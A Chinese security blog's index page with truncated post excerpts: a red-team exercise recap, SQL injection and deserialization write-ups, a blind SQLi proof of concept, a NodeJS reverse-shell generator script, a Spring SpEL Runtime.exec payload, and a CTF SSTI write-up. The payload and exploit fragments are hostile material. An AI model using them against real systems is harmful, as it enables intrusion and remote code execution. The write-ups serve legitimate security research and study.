c0ll4r

0x01博客许久未更新 很久很久了 之前挖了个啥用没有的day就想着先不同步到公网上去 其实这个hexo真的很方便了 公网和本机真的差别不大 要启动就是一条命令的事情 但是吧 博客域名买了五年 也不能空着 我对博客这个事情还是有点“情怀”的 所以不管了 直接同步上去吧 这个洞也不是啥大宝贝 没啥实质性太大的用处 博客还是要勤快的更新 脑子里要不断的学习新的知识 0x02这段时间呢 也算是瞎忙 但是自己有没有真正的提升我还是知道的 好像这几年来我都没有什么提升啊 但好像又增长了很多经验 刚完事了一场省会城市的攻防演练 确实相比较于其他地级市卷了不少 成绩还算满意 也算是我们一个团队的成果 我还是第一次打25k分(这个分数好像对沿海城市的一些攻防演练来说算不上什么 但是在我们这里已经不算很低了) 某头部厂商打了41K拿了第一。我们毕竟是学校队伍 很多资源之类的是与厂商不能比的。这次呢我也算发挥可以 最后两天拿了个靶标的shell 拿了将近一个区的人口数据 然后又是个重大成果 这个点大概上了10k+的分数吧 开打前几天我一直没啥产出 在那里写报告 然后就陷入了自我怀疑 自我否定的轮回里 ...

background之前认识一个网友，说电脑网络有问题让我给他解决，有意思的是他是开的todesk让我给他解决的。没错，我todesk他电脑给他解决网络故障问题。这个例子我本来不想记录的，但是今天回家又遇到了一样的问题产生的原因，于是就想着记录一下。 网友的故障问题直接上记录吧 这里我上他电脑捣鼓了一会，确实不是浏览器的问题(像ie浏览器有的站因为TLS协议太新了的问题，ie不能正常显示的)，都能todesk了那肯定也不是网络问题。访问不了一些网站，那不就是有防火墙之类的东西拦截了吗？然后这里我就做出来判断。 我追踪了一下路由节点，就是直接光猫后面就是运营商分配的10的地址了，所以指定就是在这里的问题 我就我直接访问了第一个路由节点就是光猫的登录页面，第二个就是10的地址了，我这里也很好奇他的路由器在哪里？(她要看电视，于是我问他能不能用爱奇艺将就一下)，我就问他要光猫的后台密码。 你感觉奇怪，我感觉更奇怪，你的路由器在哪里？(一般这个过滤娱乐网址的功能路由器提供的比较多一点，能开绿色模式之类的东西，光猫也能过滤，仅仅是我个人的看法，不一定正确，我也不是专业搞网络的，233 ...

0x01这一堆实际上都没啥用 $fp参数是不可控的 0x02这里确实有注入，但是进不去这个条件，我看了数据库里压根就没有key这张表 这里$cipher我们可控，$key要从库里面取，所以这个判断应该是进不去的 if ($cipher == $key) 0x03这里的$fp实际上也算是不可控的，除非找个文件上传+路径穿越，有这东西了不如试着传马和ssh秘钥 然后我到库看了下这里的parameter_name都没有这些条件，所以不会对$record有啥影响，直接搞就行了，payload往/etc/yuneng/ecuid.conf里放 sql注入-1看起来是参数不可控的，但这里的时区是可控的，我刚看这个系统的时候被人批量打了很多弹shell的东西 date_default_timezone_set()就是个设置时区的函数，那些人批量打的id >rce.txt这种不知道是啥意思，这里面不能rce吧。 这里很明显的注入了 追get_status_zigbee() 跟status_zigbee() 直接注入 expPOST /index.php/display/sta ...

background看见微信群有人发了篇文章，这个系统我以前挖过，没找到过哪儿能rce的地方，就有点好奇他怎么找出来的。 https://mp.weixin.qq.com/s/32BdBIP0X7YvxLZeIBUqPw 这个注入也挺简单的，直接时间盲注 poc存在SQL注入的点位http://xxxxxxxx/api/client/departments2tree.php该页面POST提交的参数usernumber存在时间盲注Payload：addr=&content=&enddate=&executor=&file1=&filetype1=&fileurl=&lang=zh&priority=&relevanter=&sign=69528b7d5fec328f9b25fb1c0a67b2f8&startdate=&timestamp=1670555316267&title=&usernumber=100101'and(select*from(select+sl ...

background中秋节暗月师傅搞活动，出了个靶场然后做出来的送月饼，看了天

background平时基本都用不上APP抓包，大抵是因为还没工作用不上。抓一些微信小程序的包我都是proxifier代理到burp。至于APP的包之前都是导入证书然后直接抓，现在不行了。好像是应为不再信任第三方证书了，所以要把证书放到系统里面去，参考。https://blog.csdn.net/qq_40731934/article/details/124830493?ops_request_misc=&request_id=&biz_id=102&utm_term=burp%E6%8A%93%E5%8F%96%E5%A4%9C%E7%A5%9E%E6%A8%A1%E6%8B%9F%E5%99%A8&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-1-124830493.142%5Ev66%5Ejs_top,201%5Ev3%5Econtrol_2,213%5Ev2%5 ...

background水文一篇，没啥含金量，有手进行的东西，是我太菜了，所以觉得值得记录一下 就是一个首先输入身份信息然后返回该账号是否存在的功能点，没有验证码。正常情况下肯定burp一把梭了。但是这里发现提交的数据是被处理过了的，并不是原始的明文。乍一看就是base64，然后去解码发现解出来的全是乱码。那没法了，只能去看看前端是怎么处理的。 点击“下一步”就是直接验证用户是否存在，这里调用的是nextStep()方法找到了nextstep方法的具体操作了，account参数经encryptAES方法处理在js文件里面找到了encryptAES方法的具体操作，知道AES是对称加密，这里面也有了秘钥，那这不就来了吗？我找了很多的在线网站，都没能成功加密，我很疑惑。也不知道是啥情况。对于这些算法我也是一概不懂。但encryptAES方法就是对字符串进行AES之后再base64的。我直接用python先AES再base64之后也不行。提交过去就显示数据格式错误(这点蛮好的，方便我排错。要是统一显示账号不存在，那我可能一直走在错误的道路上也不知道)最后还是ChatGPT救了我，其实这是一个很简单 ...

漏洞成因调用了unserialize()函数假设对cookie参数进行了unserialize操作，即可触发漏洞 exp#!/usr/bin/python# Generator for encoded NodeJS reverse shells# Based on the NodeJS reverse shell by Evilpacket# https://github.com/evilpacket/node-shells/blob/master/node_revshell.js# Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)# Insecurety Research (2013) - insecurety.netimport sysif len(sys.argv) != 3: print ("Usage: %s <LHOST> <LPORT>" % (sys.argv[0])) sys.exit(0)IP_ADDR = ...

漏洞原理分析https://zhuanlan.zhihu.com/p/166373950 打法'''首先访问/api/people POST提交JSON数据{"firstName":"w3","lastName":"lkin"}来创建一个用户接着访问返回地址改为PATCH请求 content-type改为application/json-patch+jsonexp[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{生成的数字}))/lastname", "value": "whatever" }]'''payload = ...

background在某次内部赛中遇见的的题，我打了一天都没做出来。整场就一道web，给我整不会了，60人平台带不动，只能给两个环境题，一道web一道pwn，sb平台不能限制用户启动容器的数量，真tm无语…… 题目简述上来就是一个请输入用户名的页面，输入完成后跳转到商品页面。点击商品详情就显示“hello XXX，这件商品的价格是XXX”点击buyflag提示money money money抓包分析发现就是通过session来进行鉴权的，session不对就会跳转到一个页面一开始不知道也没想那么多，jwt解了一下发现是hs256，扫了目录没发现私钥就直接和jwt杠上了，改none这些都没用，然后就执着的跑key，rockyou跑完了，各种常见字典都跑了，还生成了4位数所有密码的排列组合，都无效。 后面想到了hello**，于是才想起来考点可能在ssti(当时比赛的时候有师傅说这题是xss，没毛病，确实有xss,hhhhh)，49，{77}都直接报错了。接下来就是常规操作，但是一直报错，给我整到怀疑人生了。在报错页面我看到了部分源码的我发现了代码里面写的commodity.name，c ...